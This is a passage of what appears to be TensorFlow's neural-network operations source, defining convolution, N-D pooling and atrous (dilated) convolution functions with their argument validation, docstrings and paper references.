Tensor of the same type as `orig` and with shape
`[max(spatial_dims), ...]` where:
adjusted[spatial_dims[i] - 1, ...] = orig[i, ...]
for 0 <= i < len(spatial_dims), and
adjusted[j, ...] = fill_value
for j != spatial_dims[i] - 1 for some i.
If `orig` is a constant value, then the result will be a constant value.
Args:
orig: Tensor whose first dimension has size `len(spatial_dims)` (i.e. one
  entry per spatial dimension).
fill_value: Numpy scalar (of same data type as `orig`) specifying the fill
  value for non-spatial dimensions.
spatial_dims: See with_space_to_batch.
Returns:
`adjusted` tensor.
"""
fill_dims = orig.get_shape().as_list()[1:]
dtype = orig.dtype.as_numpy_dtype
parts = []
const_orig = tensor_util.constant_value(orig)
const_or_orig = const_orig if const_orig is not None else orig
prev_spatial_dim = 0
i = 0
while i < len(spatial_dims):
start_i = i
start_spatial_dim = spatial_dims[i]
if start_spatial_dim > 1:
# Fill in any gap from the previous spatial dimension (or dimension 1 if
# this is the first spatial dimension) with `fill_value`.
parts.append(
np.full(
[start_spatial_dim - 1 - prev_spatial_dim] + fill_dims,
fill_value,
dtype=dtype))
# Find the largest value of i such that:
# [spatial_dims[start_i], ..., spatial_dims[i]]
# == [start_spatial_dim, ..., start_spatial_dim + i - start_i],
# i.e. the end of a contiguous group of spatial dimensions.
while (i + 1 < len(spatial_dims) and
spatial_dims[i + 1] == spatial_dims[i] + 1):
i += 1
parts.append(const_or_orig[start_i:i + 1])
prev_spatial_dim = spatial_dims[i]
i += 1
if const_orig is not None:
return np.concatenate(parts)
else:
return array_ops.concat(parts, 0)
def _get_strides_and_dilation_rate(num_spatial_dims, strides, dilation_rate):
"""Helper function for verifying strides and dilation_rate arguments.
This is used by `convolution` and `pool`.
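For example (an illustrative call; this helper is internal to this module):

```python
strides, dilation_rate = _get_strides_and_dilation_rate(2, None, [2, 2])
# strides       -> array([1, 1], dtype=int32)
# dilation_rate -> array([2, 2], dtype=int32)
```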
Args:
num_spatial_dims: int
strides: Optional. List of N ints >= 1. Defaults to [1]*N. If any value
of strides is > 1, then all values of dilation_rate must be 1.
dilation_rate: Optional. List of N ints >= 1. Defaults to [1]*N. If any
value of dilation_rate is > 1, then all values of strides must be 1.
Returns:
Normalized (strides, dilation_rate) as int32 numpy arrays of shape
[num_spatial_dims].
Raises:
ValueError: if the parameters are invalid.
"""
if dilation_rate is None:
dilation_rate = [1] * num_spatial_dims
elif len(dilation_rate) != num_spatial_dims:
raise ValueError("len(dilation_rate)=%d but should be %d" %
(len(dilation_rate), num_spatial_dims))
dilation_rate = np.array(dilation_rate, dtype=np.int32)
if np.any(dilation_rate < 1):
raise ValueError("all values of dilation_rate must be positive")
if strides is None:
strides = [1] * num_spatial_dims
elif len(strides) != num_spatial_dims:
raise ValueError("len(strides)=%d but should be %d" % (len(strides),
num_spatial_dims))
strides = np.array(strides, dtype=np.int32)
if np.any(strides < 1):
raise ValueError("all values of strides must be positive")
if np.any(strides > 1) and np.any(dilation_rate > 1):
raise ValueError(
"strides > 1 not supported in conjunction with dilation_rate > 1")
return strides, dilation_rate
@tf_export(v1=["nn.convolution"])
@dispatch.add_dispatch_support
def convolution(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
padding,
strides=None,
dilation_rate=None,
name=None,
data_format=None,
filters=None,
dilations=None): # pylint: disable=g-doc-args
"""Computes sums of N-D convolutions (actually cross-correlation).
This also supports either output striding via the optional `strides` parameter
or atrous convolution (also known as convolution with holes or dilated
convolution, based on the French word "trous" meaning holes in English) via
the optional `dilation_rate` parameter. Currently, however, output striding
is not supported for atrous convolutions.
Specifically, in the case that `data_format` does not start with "NC", given
a rank (N+2) `input` Tensor of shape
[num_batches,
input_spatial_shape[0],
...,
input_spatial_shape[N-1],
num_input_channels],
a rank (N+2) `filter` Tensor of shape
[spatial_filter_shape[0],
...,
spatial_filter_shape[N-1],
num_input_channels,
num_output_channels],
an optional `dilation_rate` tensor of shape [N] (defaulting to [1]*N)
specifying the filter upsampling/input downsampling rate, and an optional list
of N `strides` (defaulting to [1]*N), this computes for each N-D spatial output
position (x[0], ..., x[N-1]):
```
output[b, x[0], ..., x[N-1], k] =
sum_{z[0], ..., z[N-1], q}
filter[z[0], ..., z[N-1], q, k] *
padded_input[b,
x[0]*strides[0] + dilation_rate[0]*z[0],
...,
x[N-1]*strides[N-1] + dilation_rate[N-1]*z[N-1],
q]
```
where b is the index into the batch, k is the output channel number, q is the
input channel number, and z is the N-D spatial offset within the filter. Here,
`padded_input` is obtained by zero padding the input using an effective
spatial filter shape of `(spatial_filter_shape-1) * dilation_rate + 1` and
output striding `strides`.
In the case that `data_format` does start with `"NC"`, the `input` and output
(but not the `filter`) are simply transposed as follows:
convolution(input, data_format, **kwargs) =
tf.transpose(convolution(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
It is required that 1 <= N <= 3.
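For instance, a minimal 2-D sketch (arbitrary illustrative shapes):

```python
import tensorflow as tf

x = tf.random.normal([1, 32, 32, 3])   # NHWC input
w = tf.random.normal([3, 3, 3, 16])    # [height, width, in_ch, out_ch] filter
y = tf.nn.convolution(x, w, padding="SAME")
# `y` has shape [1, 32, 32, 16]; strides and dilations default to 1.
```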
Args:
input: An (N+2)-D `Tensor` of type `T`, of shape
`[batch_size] + input_spatial_shape + [in_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, in_channels] + input_spatial_shape` if data_format starts
with "NC".
filter: An (N+2)-D `Tensor` with the same type as `input` and shape
`spatial_filter_shape + [in_channels, out_channels]`.
padding: A string, either `"VALID"` or `"SAME"`. The padding algorithm.
`"valid"` means no padding. `"same"` results in padding evenly to
the left/right or up/down of the input such that output has the same
height/width dimension as the input.
strides: Optional. Sequence of N ints >= 1. Specifies the output stride.
Defaults to [1]*N. If any value of strides is > 1, then all values of
dilation_rate must be 1.
dilation_rate: Optional. Sequence of N ints >= 1. Specifies the filter
upsampling/input downsampling rate. In the literature, the same parameter
is sometimes called `input stride` or `dilation`. The effective filter
size used for the convolution will be `spatial_filter_shape +
(spatial_filter_shape - 1) * (dilation_rate - 1)`, obtained by inserting
(dilation_rate[i]-1) zeros between consecutive elements of the original
filter in each spatial dimension i. If any value of dilation_rate is > 1,
then all values of strides must be 1.
name: Optional name for the returned tensor.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
Returns:
A `Tensor` with the same type as `input` of shape
`[batch_size] + output_spatial_shape + [out_channels]`
if data_format is None or does not start with "NC", or
`[batch_size, out_channels] + output_spatial_shape`
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of `padding`.
If padding == "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding == "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] -
(spatial_filter_shape[i]-1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: If input/output depth does not match `filter` shape, if padding
is other than `"VALID"` or `"SAME"`, or if data_format is invalid.
"""
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
dilation_rate = deprecated_argument_lookup(
"dilations", dilations, "dilation_rate", dilation_rate)
return convolution_internal(
input,
filter,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilation_rate,
name=name)
@tf_export("nn.convolution", v1=[])
@dispatch.add_dispatch_support
def convolution_v2( # pylint: disable=missing-docstring
input, # pylint: disable=redefined-builtin
filters,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None):
return convolution_internal(
input, # pylint: disable=redefined-builtin
filters,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
convolution_v2.__doc__ = deprecation.rewrite_argument_docstring(
deprecation.rewrite_argument_docstring(
convolution.__doc__, "dilation_rate", "dilations"),
"filter", "filters")
def convolution_internal(
input, # pylint: disable=redefined-builtin
filters,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None,
call_from_convolution=True,
num_spatial_dims=None):
"""Internal function which performs rank agnostic convolution.
Args:
input: See `convolution`.
filters: See `convolution`.
strides: See `convolution`.
padding: See `convolution`.
data_format: See `convolution`.
dilations: See `convolution`.
name: See `convolution`.
call_from_convolution: See `convolution`.
num_spatial_dims: (Optional.) An integer describing the
rank of the spatial dimensions. For `1-D`, `2-D` and `3-D` convolutions,
the value of `num_spatial_dims` is `1`, `2`, and `3`, respectively.
This argument is only required to disambiguate the rank of `batch_shape`
when `filter_shape.ndims is None` and `len(batch_shape) > 1`. For
backwards compatibility, if `num_spatial_dims is None` and
`filter_shape.ndims is None`, then `len(batch_shape)` is assumed to be
`1` (i.e., the input is expected to be
`[batch_size, num_channels] + input_spatial_shape`
or `[batch_size] + input_spatial_shape + [num_channels]`).
Returns:
A tensor of shape and dtype matching that of `input`.
Raises:
ValueError: If input and filter both have unknown shapes, or if
`num_spatial_dims` is provided and incompatible with the value
estimated from `filters.shape`.
"""
if (not isinstance(filters, variables_lib.Variable) and
not tensor_util.is_tf_type(filters)):
with ops.name_scope("convolution_internal", None, [filters, input]):
filters = ops.convert_to_tensor(filters, name='filters')
if (not isinstance(input, ops.Tensor) and not tensor_util.is_tf_type(input)):
with ops.name_scope("convolution_internal", None, [filters, input]):
input = ops.convert_to_tensor(input, name="input")
filters_rank = filters.shape.rank
inputs_rank = input.shape.rank
if num_spatial_dims is None:
if filters_rank:
num_spatial_dims = filters_rank - 2
elif inputs_rank:
num_spatial_dims = inputs_rank - 2
else:
raise ValueError("rank of input or filter must be known")
elif filters_rank and filters_rank - 2 != num_spatial_dims:
raise ValueError(
"inconsistent estimate of spatial dims ({}) vs. actual passed "
"num_spatial_dims ({}). n was estimated as len(filters.shape) - 2, "
"but filters shape is: {}".format(filters_rank, num_spatial_dims,
filters.shape))
if inputs_rank:
num_batch_dims = inputs_rank - num_spatial_dims - 1 # Channel dimension.
else:
num_batch_dims = 1 # By default, assume single batch dimension.
if num_spatial_dims not in {1, 2, 3}:
raise ValueError(
"num_spatial_dims (input.shape.ndims - num_batch_dims - 1) must be one "
"of 1, 2 or 3 but saw {}. num_batch_dims: {}.".format(
num_spatial_dims, num_batch_dims))
if data_format is None or data_format in _CHANNELS_LAST_FORMATS:
channel_index = num_batch_dims + num_spatial_dims
else:
channel_index = num_batch_dims
if dilations is None:
dilations = _get_sequence(dilations, num_spatial_dims, channel_index,
"dilations")
is_dilated_conv = False
else:
dilations = _get_sequence(dilations, num_spatial_dims, channel_index,
"dilations")
is_dilated_conv = any(i != 1 for i in dilations)
strides = _get_sequence(strides, num_spatial_dims, channel_index, "strides")
has_tpu_context = device_context.enclosing_tpu_context() is not None
if name:
default_name = None
elif not has_tpu_context or call_from_convolution:
default_name = "convolution"
elif num_spatial_dims == 2: # Most common case.
default_name = "Conv2D"
elif num_spatial_dims == 3:
default_name = "Conv3D"
else:
default_name = "conv1d"
with ops.name_scope(name, default_name, [input, filters]) as name:
# Fast path for TPU or if no dilation, as gradient only supported on TPU
# for dilations.
if not is_dilated_conv or has_tpu_context:
if num_spatial_dims == 2: # Most common case.
op = _conv2d_expanded_batch
elif num_spatial_dims == 3:
op = _conv3d_expanded_batch
else:
op = conv1d
return op(
input,
filters,
strides,
padding=padding,
data_format=data_format,
dilations=dilations,
name=name)
else:
if channel_index == 1:
strides = strides[2:]
dilations = dilations[2:]
else:
strides = strides[1:-1]
dilations = dilations[1:-1]
op = Convolution(
tensor_shape.as_shape(input.shape),
tensor_shape.as_shape(filters.shape),
padding,
strides=strides,
dilation_rate=dilations,
name=name,
data_format=data_format,
num_spatial_dims=num_spatial_dims)
return op(input, filters)
class Convolution(object):
"""Helper class for convolution.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape`, `filter_shape`, and
`num_spatial_dims` passed to the constructor.
Arguments
input_shape: static shape of input. i.e. input.shape. Its length is
`batch_shape + input_spatial_shape + [num_channels]` if `data_format`
does not start with `NC`, or
`batch_shape + [num_channels] + input_spatial_shape` if `data_format`
starts with `NC`.
filter_shape: static shape of the filter. i.e. filter.shape.
padding: The padding algorithm, must be "SAME" or "VALID".
strides: see convolution.
dilation_rate: see convolution.
name: see convolution.
data_format: A string or `None`. Specifies whether the channel dimension of
the `input` and output is the last dimension (if `data_format` is `None`
or does not start with `NC`), or the first post-batch dimension (i.e. if
`data_format` starts with `NC`).
num_spatial_dims: (Usually optional.) Python integer, the number of
  spatial dimensions. For `1-D`, `2-D` and `3-D` convolutions,
the value of `num_spatial_dims` is `1`, `2`, and `3`, respectively.
This argument is only required to disambiguate the rank of `batch_shape`
when `filter_shape.ndims is None` and `len(batch_shape) > 1`. For
backwards compatibility, if `num_spatial_dims is None` and
`filter_shape.ndims is None`, then `len(batch_shape)` is assumed to be
`1` (i.e., the input is expected to be
`[batch_size, num_channels] + input_spatial_shape`
or `[batch_size] + input_spatial_shape + [num_channels]`).
"""
def __init__(self,
input_shape,
filter_shape,
padding,
strides=None,
dilation_rate=None,
name=None,
data_format=None,
num_spatial_dims=None):
"""Helper function for convolution."""
num_batch_dims = None
filter_shape = tensor_shape.as_shape(filter_shape)
input_shape = tensor_shape.as_shape(input_shape)
if filter_shape.ndims is not None:
if (num_spatial_dims is not None and
filter_shape.ndims != num_spatial_dims + 2):
raise ValueError(
"Expected filter_shape.ndims == num_spatial_dims + 2, "
"but saw filter_shape.ndims == {} and num_spatial_dims == {}"
.format(filter_shape.ndims, num_spatial_dims))
else:
num_spatial_dims = filter_shape.ndims - 2
if input_shape.ndims is not None and num_spatial_dims is not None:
num_batch_dims = input_shape.ndims - num_spatial_dims - 1
if num_spatial_dims is None:
num_spatial_dims = input_shape.ndims - 2
else:
if input_shape.ndims is not None:
if input_shape.ndims < num_spatial_dims + 2:
raise ValueError(
"Expected input_shape.ndims >= num_spatial_dims + 2, but saw "
"input_shape.ndims == {} and num_spatial_dims == {}"
.format(input_shape.ndims, num_spatial_dims))
else:
if num_batch_dims is None:
num_batch_dims = input_shape.ndims - num_spatial_dims - 1
if num_spatial_dims is None:
raise ValueError(
"Cannot estimate num_spatial_dims since input_shape.ndims is None, "
"filter_shape.ndims is None, and argument num_spatial_dims is also "
"None.")
if num_batch_dims is None:
num_batch_dims = 1
if num_batch_dims < 1:
raise ValueError(
"num_batch_dims should be >= 1, but saw {}. num_batch_dims was "
"estimated as `input_shape.ndims - num_spatial_dims - 1` and "
"num_spatial_dims was either provided or estimated as "
"`filter_shape.ndims - 2`. input_shape.ndims: {}, "
"num_spatial_dims: {}, filter_shape.ndims: {}"
.format(num_batch_dims, input_shape.ndims, num_spatial_dims,
filter_shape.ndims))
if data_format is None or not data_format.startswith("NC"):
input_channels_dim = tensor_shape.dimension_at_index(
input_shape, num_spatial_dims + num_batch_dims)
spatial_dims = range(num_batch_dims, num_spatial_dims + num_batch_dims)
else:
input_channels_dim = tensor_shape.dimension_at_index(
input_shape, num_batch_dims)
spatial_dims = range(
num_batch_dims + 1, num_spatial_dims + num_batch_dims + 1)
filter_dim = tensor_shape.dimension_at_index(filter_shape, num_spatial_dims)
if not (input_channels_dim % filter_dim).is_compatible_with(0):
raise ValueError("The number of input channels is not divisible by the "
"corresponding number of output filters. Received: "
"input channels={}, output filters={}".format(
input_channels_dim, filter_dim))
strides, dilation_rate = _get_strides_and_dilation_rate(
num_spatial_dims, strides, dilation_rate)
self.input_shape = input_shape
self.filter_shape = filter_shape
self.data_format = data_format
self.strides = strides
self.padding = padding
self.name = name
self.dilation_rate = dilation_rate
self.num_batch_dims = num_batch_dims
self.num_spatial_dims = num_spatial_dims
self.conv_op = _WithSpaceToBatch(
input_shape,
dilation_rate=dilation_rate,
padding=padding,
build_op=self._build_op,
filter_shape=filter_shape,
spatial_dims=spatial_dims,
data_format=data_format,
num_batch_dims=num_batch_dims)
def _build_op(self, _, padding):
return _NonAtrousConvolution(
self.input_shape,
filter_shape=self.filter_shape,
padding=padding,
data_format=self.data_format,
strides=self.strides,
name=self.name,
num_batch_dims=self.num_batch_dims)
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
# TPU convolution supports dilations greater than 1.
if device_context.enclosing_tpu_context() is not None:
return convolution_internal(
inp,
filter,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilations=self.dilation_rate,
name=self.name,
call_from_convolution=False,
num_spatial_dims=self.num_spatial_dims)
else:
return self.conv_op(inp, filter)
@tf_export(v1=["nn.pool"])
@dispatch.add_dispatch_support
def pool(
input, # pylint: disable=redefined-builtin
window_shape,
pooling_type,
padding,
dilation_rate=None,
strides=None,
name=None,
data_format=None,
dilations=None):
"""Performs an N-D pooling operation.
In the case that `data_format` does not start with "NC", computes for
0 <= b < batch_size,
0 <= x[i] < output_spatial_shape[i],
0 <= c < num_channels:
```
output[b, x[0], ..., x[N-1], c] =
REDUCE_{z[0], ..., z[N-1]}
input[b,
x[0] * strides[0] - pad_before[0] + dilation_rate[0]*z[0],
...
x[N-1]*strides[N-1] - pad_before[N-1] + dilation_rate[N-1]*z[N-1],
c],
```
where the reduction function REDUCE depends on the value of `pooling_type`,
and pad_before is defined based on the value of `padding`; see the
"returns" section of `tf.nn.convolution` for details.
The reduction never includes out-of-bounds positions.
In the case that `data_format` starts with `"NC"`, the `input` and output are
simply transposed as follows:
```
pool(input, data_format, **kwargs) =
tf.transpose(pool(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
```
Args:
input: Tensor of rank N+2, of shape
`[batch_size] + input_spatial_shape + [num_channels]` if data_format does
not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
window_shape: Sequence of N ints >= 1.
pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
padding: The padding algorithm, must be "SAME" or "VALID".
See the "returns" section of `tf.nn.convolution` for details.
dilation_rate: Optional. Dilation rate. List of N ints >= 1.
Defaults to [1]*N. If any value of dilation_rate is > 1, then all values
of strides must be 1.
strides: Optional. Sequence of N ints >= 1. Defaults to [1]*N.
If any value of strides is > 1, then all values of dilation_rate must be
1.
name: Optional. Name of the op.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: Alias for dilation_rate
Returns:
Tensor of rank N+2, of shape
[batch_size] + output_spatial_shape + [num_channels]
if data_format is None or does not start with "NC", or
[batch_size, num_channels] + output_spatial_shape
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of padding:
If padding = "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding = "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] - (window_shape[i] - 1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: if arguments are invalid.
"""
dilation_rate = deprecated_argument_lookup(
"dilations", dilations, "dilation_rate", dilation_rate)
# pylint: enable=line-too-long
with ops.name_scope(name, "%s_pool" % (pooling_type.lower()),
[input]) as scope:
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
num_spatial_dims = len(window_shape)
if num_spatial_dims < 1 or num_spatial_dims > 3:
raise ValueError("It is required that 1 <= num_spatial_dims <= 3.")
input.get_shape().with_rank(num_spatial_dims + 2)
strides, dilation_rate = _get_strides_and_dilation_rate(
num_spatial_dims, strides, dilation_rate)
if padding == "SAME" and np.any(dilation_rate > 1):
raise ValueError(
"pooling with SAME padding is not implemented for dilation_rate > 1")
if np.any(strides > window_shape):
raise ValueError(
"strides > window_shape not supported due to inconsistency between "
"CPU and GPU implementations")
pooling_ops = {
("MAX", 1): max_pool,
("MAX", 2): max_pool,
("MAX", 3): max_pool3d, # pylint: disable=undefined-variable
("AVG", 1): avg_pool,
("AVG", 2): avg_pool,
("AVG", 3): avg_pool3d, # pylint: disable=undefined-variable
}
op_key = (pooling_type, num_spatial_dims)
if op_key not in pooling_ops:
raise ValueError("%d-D %s pooling is not supported." % (op_key[1],
op_key[0]))
if data_format is None or not data_format.startswith("NC"):
adjusted_window_shape = [1] + list(window_shape) + [1]
adjusted_strides = [1] + list(strides) + [1]
spatial_dims = range(1, num_spatial_dims + 1)
else:
adjusted_window_shape = [1, 1] + list(window_shape)
adjusted_strides = [1, 1] + list(strides)
spatial_dims = range(2, num_spatial_dims + 2)
if num_spatial_dims == 1:
if data_format is None or data_format == "NWC":
data_format_kwargs = dict(data_format="NHWC")
elif data_format == "NCW":
data_format_kwargs = dict(data_format="NCHW")
else:
raise ValueError("data_format must be either \"NWC\" or \"NCW\".")
adjusted_window_shape = [1] + adjusted_window_shape
adjusted_strides = [1] + adjusted_strides
else:
data_format_kwargs = dict(data_format=data_format)
def op(converted_input, _, converted_padding): # pylint: disable=missing-docstring
if num_spatial_dims == 1:
converted_input = array_ops.expand_dims(converted_input,
spatial_dims[0])
result = pooling_ops[op_key](
converted_input,
adjusted_window_shape,
adjusted_strides,
converted_padding,
name=scope,
**data_format_kwargs)
if num_spatial_dims == 1:
result = array_ops.squeeze(result, [spatial_dims[0]])
return result
return with_space_to_batch(
input=input,
dilation_rate=dilation_rate,
padding=padding,
op=op,
spatial_dims=spatial_dims,
filter_shape=window_shape)
@tf_export("nn.pool", v1=[])
@dispatch.add_dispatch_support
def pool_v2(
input, # pylint: disable=redefined-builtin
window_shape,
pooling_type,
strides=None,
padding="VALID",
data_format=None,
dilations=None,
name=None):
# pylint: disable=line-too-long
"""Performs an N-D pooling operation.
In the case that `data_format` does not start with "NC", computes for
0 <= b < batch_size,
0 <= x[i] < output_spatial_shape[i],
0 <= c < num_channels:
```
output[b, x[0], ..., x[N-1], c] =
REDUCE_{z[0], ..., z[N-1]}
input[b,
x[0] * strides[0] - pad_before[0] + dilation_rate[0]*z[0],
...
x[N-1]*strides[N-1] - pad_before[N-1] + dilation_rate[N-1]*z[N-1],
c],
```
where the reduction function REDUCE depends on the value of `pooling_type`,
and pad_before is defined based on the value of `padding`; see the
"returns" section of `tf.nn.convolution` for details.
The reduction never includes out-of-bounds positions.
In the case that `data_format` starts with `"NC"`, the `input` and output are
simply transposed as follows:
```
pool(input, data_format, **kwargs) =
tf.transpose(pool(tf.transpose(input, [0] + range(2,N+2) + [1]),
**kwargs),
[0, N+1] + range(1, N+1))
```
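For example, a minimal 2-D max-pooling sketch (illustrative shapes):

```python
import tensorflow as tf

x = tf.random.normal([1, 8, 8, 3])
y = tf.nn.pool(x, window_shape=[2, 2], pooling_type="MAX",
               strides=[2, 2], padding="VALID")
# `y` has shape [1, 4, 4, 3].
```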
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if data_format does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
window_shape: Sequence of N ints >= 1.
pooling_type: Specifies pooling operation, must be "AVG" or "MAX".
strides: Optional. Sequence of N ints >= 1. Defaults to [1]*N. If any value of
strides is > 1, then all values of dilation_rate must be 1.
padding: The padding algorithm, must be "SAME" or "VALID". Defaults to "VALID".
See the "returns" section of `tf.nn.convolution` for details.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW". For
N=3, the valid values are "NDHWC" (default) and "NCDHW".
dilations: Optional. Dilation rate. List of N ints >= 1. Defaults to
[1]*N. If any value of dilation_rate is > 1, then all values of strides
must be 1.
name: Optional. Name of the op.
Returns:
Tensor of rank N+2, of shape
[batch_size] + output_spatial_shape + [num_channels]
if data_format is None or does not start with "NC", or
[batch_size, num_channels] + output_spatial_shape
if data_format starts with "NC",
where `output_spatial_shape` depends on the value of padding:
If padding = "SAME":
output_spatial_shape[i] = ceil(input_spatial_shape[i] / strides[i])
If padding = "VALID":
output_spatial_shape[i] =
ceil((input_spatial_shape[i] - (window_shape[i] - 1) * dilation_rate[i])
/ strides[i]).
Raises:
ValueError: if arguments are invalid.
"""
return pool(
input=input,
window_shape=window_shape,
pooling_type=pooling_type,
padding=padding,
dilation_rate=dilations,
strides=strides,
name=name,
data_format=data_format)
@tf_export("nn.atrous_conv2d")
@dispatch.add_dispatch_support
def atrous_conv2d(value, filters, rate, padding, name=None):
"""Atrous convolution (a.k.a. convolution with holes or dilated convolution).
This function is a simpler wrapper around the more general
`tf.nn.convolution`, and exists only for backwards compatibility. You can
use `tf.nn.convolution` to perform 1-D, 2-D, or 3-D atrous convolution.
Computes a 2-D atrous convolution, also known as convolution with holes or
dilated convolution, given 4-D `value` and `filters` tensors. If the `rate`
parameter is equal to one, it performs regular 2-D convolution. If the `rate`
parameter is greater than one, it performs convolution with holes, sampling
the input values every `rate` pixels in the `height` and `width` dimensions.
This is equivalent to convolving the input with a set of upsampled filters,
produced by inserting `rate - 1` zeros between two consecutive values of the
filters along the `height` and `width` dimensions, hence the name atrous
convolution or convolution with holes (the French word trous means holes in
English).
More specifically:
```
output[batch, height, width, out_channel] =
sum_{dheight, dwidth, in_channel} (
filters[dheight, dwidth, in_channel, out_channel] *
value[batch, height + rate*dheight, width + rate*dwidth, in_channel]
)
```
Atrous convolution allows us to explicitly control how densely to compute
feature responses in fully convolutional networks. Used in conjunction with
bilinear interpolation, it offers an alternative to `conv2d_transpose` in
dense prediction tasks such as semantic image segmentation, optical flow
computation, or depth estimation. It also allows us to effectively enlarge
the field of view of filters without increasing the number of parameters or
the amount of computation.
For a description of atrous convolution and how it can be used for dense
feature extraction, please see: (Chen et al., 2015). The same operation is
investigated further in (Yu et al., 2016). Previous works that effectively
use atrous convolution in different ways are, among others,
(Sermanet et al., 2014) and (Giusti et al., 2013).
Atrous convolution is also closely related to the so-called noble identities
in multi-rate signal processing.
There are many different ways to implement atrous convolution (see the refs
above). The implementation here reduces
```python
atrous_conv2d(value, filters, rate, padding=padding)
```
to the following three operations:
```python
paddings = ...
net = space_to_batch(value, paddings, block_size=rate)
net = conv2d(net, filters, strides=[1, 1, 1, 1], padding="VALID")
crops = ...
net = batch_to_space(net, crops, block_size=rate)
```
Advanced usage. Note the following optimization: A sequence of `atrous_conv2d`
operations with identical `rate` parameters, 'SAME' `padding`, and filters
with odd heights/ widths:
```python
net = atrous_conv2d(net, filters1, rate, padding="SAME")
net = atrous_conv2d(net, filters2, rate, padding="SAME")
...
net = atrous_conv2d(net, filtersK, rate, padding="SAME")
```
can be equivalently performed cheaper in terms of computation and memory as:
```python
pad = ... # padding so that the input dims are multiples of rate
net = space_to_batch(net, paddings=pad, block_size=rate)
net = conv2d(net, filters1, strides=[1, 1, 1, 1], padding="SAME")
net = conv2d(net, filters2, strides=[1, 1, 1, 1], padding="SAME")
...
net = conv2d(net, filtersK, strides=[1, 1, 1, 1], padding="SAME")
net = batch_to_space(net, crops=pad, block_size=rate)
```
because a pair of consecutive `space_to_batch` and `batch_to_space` ops with
the same `block_size` cancel out when their respective `paddings` and `crops`
inputs are identical.
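A minimal usage sketch (illustrative shapes only):

```python
import tensorflow as tf

value = tf.random.normal([1, 28, 28, 3])
filters = tf.random.normal([3, 3, 3, 8])
out = tf.nn.atrous_conv2d(value, filters, rate=2, padding="SAME")
# `out` has shape [1, 28, 28, 8]; with rate=2 the effective kernel is 5x5.
```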
Args:
value: A 4-D `Tensor` of type `float`. It needs to be in the default "NHWC"
format. Its shape is `[batch, in_height, in_width, in_channels]`.
filters: A 4-D `Tensor` with the same type as `value` and shape
`[filter_height, filter_width, in_channels, out_channels]`. `filters`'
`in_channels` dimension must match that of `value`. Atrous convolution is
equivalent to standard convolution with upsampled filters with effective
height `filter_height + (filter_height - 1) * (rate - 1)` and effective
width `filter_width + (filter_width - 1) * (rate - 1)`, produced by
inserting `rate - 1` zeros along consecutive elements across the
`filters`' spatial dimensions.
rate: A positive int32. The stride with which we sample input values across
the `height` and `width` dimensions. Equivalently, the rate by which we
upsample the filter values by inserting zeros across the `height` and
`width` dimensions. In the literature, the same parameter is sometimes
called `input stride` or `dilation`.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm.
name: Optional name for the returned tensor.
Returns:
A `Tensor` with the same type as `value`.
Output shape with `'VALID'` padding is:
    [batch, height - rate * (filter_height - 1),
     width - rate * (filter_width - 1), out_channels].
Output shape with `'SAME'` padding is:
[batch, height, width, out_channels].
Raises:
ValueError: If input/output depth does not match `filters`' shape, or if
padding is other than `'VALID'` or `'SAME'`.
References:
Multi-Scale Context Aggregation by Dilated Convolutions:
[Yu et al., 2016](https://arxiv.org/abs/1511.07122)
([pdf](https://arxiv.org/pdf/1511.07122.pdf))
Semantic Image Segmentation with Deep Convolutional Nets and Fully
Connected CRFs:
[Chen et al., 2015](http://arxiv.org/abs/1412.7062)
([pdf](https://arxiv.org/pdf/1412.7062))
OverFeat - Integrated Recognition, Localization and Detection using
Convolutional Networks:
[Sermanet et al., 2014](https://arxiv.org/abs/1312.6229)
([pdf](https://arxiv.org/pdf/1312.6229.pdf))
Fast Image Scanning with Deep Max-Pooling Convolutional Neural Networks:
[Giusti et al., 2013]
(https://ieeexplore.ieee.org/abstract/document/6738831)
([pdf](https://arxiv.org/pdf/1302.1700.pdf))
"""
return convolution(
input=value,
filter=filters,
padding=padding,
dilation_rate=np.broadcast_to(rate, (2,)),
name=name)
def convert_padding(padding, expected_length=4):
"""Converts Python padding to C++ padding for ops which take EXPLICIT padding.
Args:
